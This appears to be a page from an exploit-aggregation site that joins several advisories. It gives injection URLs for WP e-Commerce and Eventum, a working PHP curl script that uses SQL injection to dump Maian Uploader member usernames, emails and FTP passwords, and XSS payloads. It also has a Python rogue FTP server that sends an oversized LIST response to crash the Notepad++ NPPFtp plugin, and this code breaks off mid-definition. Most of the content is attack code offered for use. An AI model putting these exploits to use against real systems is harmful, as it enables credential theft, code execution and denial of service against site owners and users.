HireHackking

source: https://www.securityfocus.com/bid/65130/info The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including: 1. Multiple remote code-execution vulnerabilities. 2. A local file-include vulnerability 3. An arbitrary file-upload vulnerability An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, upload arbitrary files to the affected computer that may result in arbitrary code execution within the context of the vulnerable application. WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected. Local file-include http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI] Remote code-execution http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD] http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]

source: https://www.securityfocus.com/bid/65186/info Eventum is prone to an insecure file-permission vulnerability. An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks. Eventum 2.3.4 is vulnerable; other versions may also be affected. Following example URI is available. http://www.example.com/setup/index.php

source: https://www.securityfocus.com/bid/65137/info Maian Uploader is prone to multiple security vulnerabilities, including: 1. An SQL-injection vulnerability 2. Multiple cross-site scripting vulnerabilities Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Maian Uploader 4.0 is vulnerable; other versions may also be affected. +] Exploit (1) ' SQL Injection ' => # # <?php # # /* # # - move.php (lines: 90 > 92 ) # $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members # WHERE id != '".$_POST['id']."' # ORDER BY accname") or die(mysql_error()); # # */ # # $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members"; # # $ch = curl_init(); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php"); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_POST, 1); # curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli"); # $exploit = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $exploit; # ?> # #### # # [+] Exploit (2) ' XSRF/XSS ' => # # - load_flv.js.php ( line : 25 ) # document.write('<object type="application/x-shockwave-flash" ..... # width="<?php echo $_GET['width']; ?>" # height="<?php echo $_GET['height']; ?> # # XSS : "><h1>XsS by KedAns-Dz</h1> # XSS : "><script>Alert('XsS by KedAns-Dz');</script> # # http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ] # http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ] # # [&] Exploit (3) ' Full Path Disclosure ' => # # don't put ( &height= ) after width Xss and you get error # Notice about ( Undefined index: height ) with the Full Path Dir. # ######################################################################

# Title : Notepad ++ NPPFtp Plugin Buffer Overflow # Date : 19/12/2015 # Author : R-73eN # Tested on : NPPFtp 0.26.3 (Latest Version) # Software : http://sourceforge.net/projects/nppftp/ # Vendor : https://notepad-plus-plus.org/ # ___ __ ____ _ _ # |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | # | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | # | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ # |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| # # A buffer overflow exists in the NPPftp plugin. When the plugin is connected to a malicious server # which server a crafted LIST response causes the application to crash. # # How to reproduce # # 1. Start this python server # 2. Open Notepad ++ , go to plugins , NPPFtp, Show windows # 3. Click on the gear button to create a new connection. # 4. Create the connection to connect to the server. # 5. Connect and the application will crash. import os,socket,threading,time allow_delete = False local_ip = "192.168.1.121"#socket.gethostbyname(socket.gethostname()) local_port = 21 currdir=os.path.abspath('.') buff = "rwxrwxrwx 1 1 00" + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8Lr9Ls0Ls1Ls2Ls3Ls4Ls5Ls6Ls7Ls8Ls9Lt0Lt1Lt2Lt3Lt4Lt5Lt6Lt7Lt8Lt9Lu0Lu1Lu2Lu3Lu4Lu5Lu6Lu7Lu8Lu9Lv0Lv1Lv2Lv3Lv4Lv5Lv6Lv7Lv8Lv9Lw0Lw1Lw2Lw3Lw4Lw5Lw6Lw7Lw8Lw9Lx0Lx1Lx2Lx3Lx4Lx5Lx6Lx7Lx8Lx9Ly0Ly1Ly2Ly3Ly4Ly5Ly6Ly7Ly8Ly9Lz0Lz1Lz2Lz3Lz4Lz5Lz6Lz7Lz8Lz9Ma0Ma1Ma2Ma3Ma4Ma5Ma6Ma7Ma8Ma9Mb0Mb1Mb2Mb3Mb4Mb5Mb6Mb7Mb8Mb9Mc0Mc1Mc2Mc3Mc4Mc5Mc6Mc7Mc8Mc9Md0Md1Md2Md3Md4Md5Md6Md7Md8Md9Me0Me1Me2Me3Me4Me5Me6Me7Me8Me9Mf0Mf1Mf2Mf3Mf4Mf5Mf6Mf7Mf8Mf9Mg0Mg1Mg2Mg3Mg4Mg5Mg6Mg7Mg8Mg9Mh0Mh1Mh2Mh3Mh4Mh5Mh6Mh7Mh8Mh9Mi0Mi1Mi2Mi3Mi4Mi5Mi6Mi7Mi8Mi9Mj0Mj1Mj2Mj3Mj4Mj5Mj6Mj7Mj8Mj9Mk0Mk1Mk2Mk3Mk4Mk5Mk6Mk7Mk8Mk9Ml0Ml1Ml2Ml3Ml4Ml5Ml6Ml7Ml8Ml9Mm0Mm1Mm2Mm3Mm4Mm5Mm6Mm7Mm8Mm9Mn0Mn1Mn2Mn3Mn4Mn5Mn6Mn7Mn8Mn9Mo0Mo1Mo2Mo3Mo4Mo5Mo6Mo7Mo8Mo9Mp0Mp1Mp2Mp3Mp4Mp5Mp6Mp7Mp8Mp9Mq0Mq1Mq2Mq3Mq4Mq5Mq6Mq7Mq8Mq9Mr0Mr1Mr2Mr3Mr4Mr5Mr6Mr7Mr8Mr9Ms0Ms1Ms2Ms3Ms4Ms5Ms6Ms7Ms8Ms9Mt0Mt1Mt2Mt3Mt4Mt5Mt6Mt7Mt8Mt9Mu0Mu1Mu2Mu3Mu4Mu5Mu6Mu7Mu8Mu9Mv0Mv1Mv2M" class FTPserverThread(threading.Thread): def __init__(self,(conn,addr)): self.conn=conn self.addr=addr self.basewd=currdir self.cwd=self.basewd self.rest=False self.pasv_mode=False threading.Thread.__init__(self) def run(self): self.conn.send('220 Welcome!\r\n') while True: cmd=self.conn.recv(256) if not cmd: break else: print 'Recieved:',cmd try: func=getattr(self,cmd[:4].strip().upper()) func(cmd) except Exception,e: print 'ERROR:',e #traceback.print_exc() self.conn.send('500 Sorry.\r\n') def 